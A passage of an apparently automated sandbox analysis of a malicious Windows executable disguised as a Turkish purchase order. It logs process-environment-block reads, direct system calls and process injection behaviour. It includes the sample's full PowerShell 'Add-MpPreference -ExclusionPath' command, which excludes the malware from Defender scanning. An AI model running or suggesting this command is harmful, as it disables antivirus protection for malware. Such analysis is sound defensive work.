            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017EA250 mov eax, dword ptr fs:[00000030h]5_2_017EA250
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B8243 mov eax, dword ptr fs:[00000030h]5_2_017B8243
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B8243 mov ecx, dword ptr fs:[00000030h]5_2_017B8243
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172823B mov eax, dword ptr fs:[00000030h]5_2_0172823B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_018062D6 mov eax, dword ptr fs:[00000030h]5_2_018062D6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017402E1 mov eax, dword ptr fs:[00000030h]5_2_017402E1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017402E1 mov eax, dword ptr fs:[00000030h]5_2_017402E1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017402E1 mov eax, dword ptr fs:[00000030h]5_2_017402E1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A2C3 mov eax, dword ptr fs:[00000030h]5_2_0173A2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A2C3 mov eax, dword ptr fs:[00000030h]5_2_0173A2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A2C3 mov eax, dword ptr fs:[00000030h]5_2_0173A2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A2C3 mov eax, dword ptr fs:[00000030h]5_2_0173A2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A2C3 mov eax, dword ptr fs:[00000030h]5_2_0173A2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017402A0 mov eax, dword ptr fs:[00000030h]5_2_017402A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017402A0 mov eax, dword ptr fs:[00000030h]5_2_017402A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C62A0 mov eax, dword ptr fs:[00000030h]5_2_017C62A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C62A0 mov ecx, dword ptr fs:[00000030h]5_2_017C62A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C62A0 mov eax, dword ptr fs:[00000030h]5_2_017C62A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C62A0 mov eax, dword ptr fs:[00000030h]5_2_017C62A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C62A0 mov eax, dword ptr fs:[00000030h]5_2_017C62A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C62A0 mov eax, dword ptr fs:[00000030h]5_2_017C62A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0180625D mov eax, dword ptr fs:[00000030h]5_2_0180625D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176E284 mov eax, dword ptr fs:[00000030h]5_2_0176E284
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176E284 mov eax, dword ptr fs:[00000030h]5_2_0176E284
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B0283 mov eax, dword ptr fs:[00000030h]5_2_017B0283
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B0283 mov eax, dword ptr fs:[00000030h]5_2_017B0283
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B0283 mov eax, dword ptr fs:[00000030h]5_2_017B0283
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176656A mov eax, dword ptr fs:[00000030h]5_2_0176656A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176656A mov eax, dword ptr fs:[00000030h]5_2_0176656A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176656A mov eax, dword ptr fs:[00000030h]5_2_0176656A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01738550 mov eax, dword ptr fs:[00000030h]5_2_01738550
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01738550 mov eax, dword ptr fs:[00000030h]5_2_01738550
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740535 mov eax, dword ptr fs:[00000030h]5_2_01740535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740535 mov eax, dword ptr fs:[00000030h]5_2_01740535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740535 mov eax, dword ptr fs:[00000030h]5_2_01740535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740535 mov eax, dword ptr fs:[00000030h]5_2_01740535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740535 mov eax, dword ptr fs:[00000030h]5_2_01740535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740535 mov eax, dword ptr fs:[00000030h]5_2_01740535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E53E mov eax, dword ptr fs:[00000030h]5_2_0175E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E53E mov eax, dword ptr fs:[00000030h]5_2_0175E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E53E mov eax, dword ptr fs:[00000030h]5_2_0175E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E53E mov eax, dword ptr fs:[00000030h]5_2_0175E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175E53E mov eax, dword ptr fs:[00000030h]5_2_0175E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C6500 mov eax, dword ptr fs:[00000030h]5_2_017C6500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804500 mov eax, dword ptr fs:[00000030h]5_2_01804500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804500 mov eax, dword ptr fs:[00000030h]5_2_01804500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DEB50 mov eax, dword ptr fs:[00000030h]5_2_017DEB50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E4B4B mov eax, dword ptr fs:[00000030h]5_2_017E4B4B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E4B4B mov eax, dword ptr fs:[00000030h]5_2_017E4B4B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C6B40 mov eax, dword ptr fs:[00000030h]5_2_017C6B40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C6B40 mov eax, dword ptr fs:[00000030h]5_2_017C6B40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FAB40 mov eax, dword ptr fs:[00000030h]5_2_017FAB40
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D8B42 mov eax, dword ptr fs:[00000030h]5_2_017D8B42
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175EB20 mov eax, dword ptr fs:[00000030h]5_2_0175EB20
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175EB20 mov eax, dword ptr fs:[00000030h]5_2_0175EB20
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F8B28 mov eax, dword ptr fs:[00000030h]5_2_017F8B28
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F8B28 mov eax, dword ptr fs:[00000030h]5_2_017F8B28
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AEB1D mov eax, dword ptr fs:[00000030h]5_2_017AEB1D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804B00 mov eax, dword ptr fs:[00000030h]5_2_01804B00
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01738BF0 mov eax, dword ptr fs:[00000030h]5_2_01738BF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01738BF0 mov eax, dword ptr fs:[00000030h]5_2_01738BF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01738BF0 mov eax, dword ptr fs:[00000030h]5_2_01738BF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175EBFC mov eax, dword ptr fs:[00000030h]5_2_0175EBFC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017BCBF0 mov eax, dword ptr fs:[00000030h]5_2_017BCBF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DEBD0 mov eax, dword ptr fs:[00000030h]5_2_017DEBD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01750BCB mov eax, dword ptr fs:[00000030h]5_2_01750BCB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01750BCB mov eax, dword ptr fs:[00000030h]5_2_01750BCB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01750BCB mov eax, dword ptr fs:[00000030h]5_2_01750BCB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01730BCD mov eax, dword ptr fs:[00000030h]5_2_01730BCD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01730BCD mov eax, dword ptr fs:[00000030h]5_2_01730BCD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01730BCD mov eax, dword ptr fs:[00000030h]5_2_01730BCD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740BBE mov eax, dword ptr fs:[00000030h]5_2_01740BBE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740BBE mov eax, dword ptr fs:[00000030h]5_2_01740BBE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E4BB0 mov eax, dword ptr fs:[00000030h]5_2_017E4BB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E4BB0 mov eax, dword ptr fs:[00000030h]5_2_017E4BB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01802B57 mov eax, dword ptr fs:[00000030h]5_2_01802B57
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01802B57 mov eax, dword ptr fs:[00000030h]5_2_01802B57
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01802B57 mov eax, dword ptr fs:[00000030h]5_2_01802B57
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01802B57 mov eax, dword ptr fs:[00000030h]5_2_01802B57
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804A80 mov eax, dword ptr fs:[00000030h]5_2_01804A80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017ACA72 mov eax, dword ptr fs:[00000030h]5_2_017ACA72
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017ACA72 mov eax, dword ptr fs:[00000030h]5_2_017ACA72
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176CA6F mov eax, dword ptr fs:[00000030h]5_2_0176CA6F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176CA6F mov eax, dword ptr fs:[00000030h]5_2_0176CA6F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176CA6F mov eax, dword ptr fs:[00000030h]5_2_0176CA6F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017DEA60 mov eax, dword ptr fs:[00000030h]5_2_017DEA60
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736A50 mov eax, dword ptr fs:[00000030h]5_2_01736A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736A50 mov eax, dword ptr fs:[00000030h]5_2_01736A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736A50 mov eax, dword ptr fs:[00000030h]5_2_01736A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736A50 mov eax, dword ptr fs:[00000030h]5_2_01736A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736A50 mov eax, dword ptr fs:[00000030h]5_2_01736A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736A50 mov eax, dword ptr fs:[00000030h]5_2_01736A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01736A50 mov eax, dword ptr fs:[00000030h]5_2_01736A50
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740A5B mov eax, dword ptr fs:[00000030h]5_2_01740A5B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740A5B mov eax, dword ptr fs:[00000030h]5_2_01740A5B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01754A35 mov eax, dword ptr fs:[00000030h]5_2_01754A35
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01754A35 mov eax, dword ptr fs:[00000030h]5_2_01754A35
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176CA38 mov eax, dword ptr fs:[00000030h]5_2_0176CA38
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176CA24 mov eax, dword ptr fs:[00000030h]5_2_0176CA24
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175EA2E mov eax, dword ptr fs:[00000030h]5_2_0175EA2E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017BCA11 mov eax, dword ptr fs:[00000030h]5_2_017BCA11
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176AAEE mov eax, dword ptr fs:[00000030h]5_2_0176AAEE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176AAEE mov eax, dword ptr fs:[00000030h]5_2_0176AAEE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01730AD0 mov eax, dword ptr fs:[00000030h]5_2_01730AD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01764AD0 mov eax, dword ptr fs:[00000030h]5_2_01764AD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01764AD0 mov eax, dword ptr fs:[00000030h]5_2_01764AD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01786ACC mov eax, dword ptr fs:[00000030h]5_2_01786ACC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01786ACC mov eax, dword ptr fs:[00000030h]5_2_01786ACC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01786ACC mov eax, dword ptr fs:[00000030h]5_2_01786ACC
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01738AA0 mov eax, dword ptr fs:[00000030h]5_2_01738AA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01738AA0 mov eax, dword ptr fs:[00000030h]5_2_01738AA0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtProtectVirtualMemory: Direct from: 0x77542F9C
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtSetInformationProcess: Direct from: 0x77542C5C
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtOpenKeyEx: Direct from: 0x77542B9C
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtProtectVirtualMemory: Direct from: 0x77537B2E
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtCreateFile: Direct from: 0x77542FEC
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtOpenFile: Direct from: 0x77542DCC
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtQueryInformationToken: Direct from: 0x77542CAC
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtDeviceIoControlFile: Direct from: 0x77542AEC
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtAllocateVirtualMemory: Direct from: 0x77542BEC
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtOpenSection: Direct from: 0x77542E0C
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtAllocateVirtualMemory: Direct from: 0x775448EC
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtSetInformationThread: Direct from: 0x775363F9
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtQuerySystemInformation: Direct from: 0x775448CC
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtClose: Direct from: 0x77542B6C
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtReadVirtualMemory: Direct from: 0x77542E8C
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtCreateKey: Direct from: 0x77542C6C
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtSetInformationThread: Direct from: 0x77542B4C
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtQueryAttributesFile: Direct from: 0x77542E6C
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtAllocateVirtualMemory: Direct from: 0x77543C9C
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtCreateUserProcess: Direct from: 0x7754371C
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtQueryInformationProcess: Direct from: 0x77542C26
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtResumeThread: Direct from: 0x77542FBC
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtWriteVirtualMemory: Direct from: 0x7754490C
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtDelayExecution: Direct from: 0x77542DDC
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe NtAllocateVirtualMemory: Direct from: 0x77542BFC
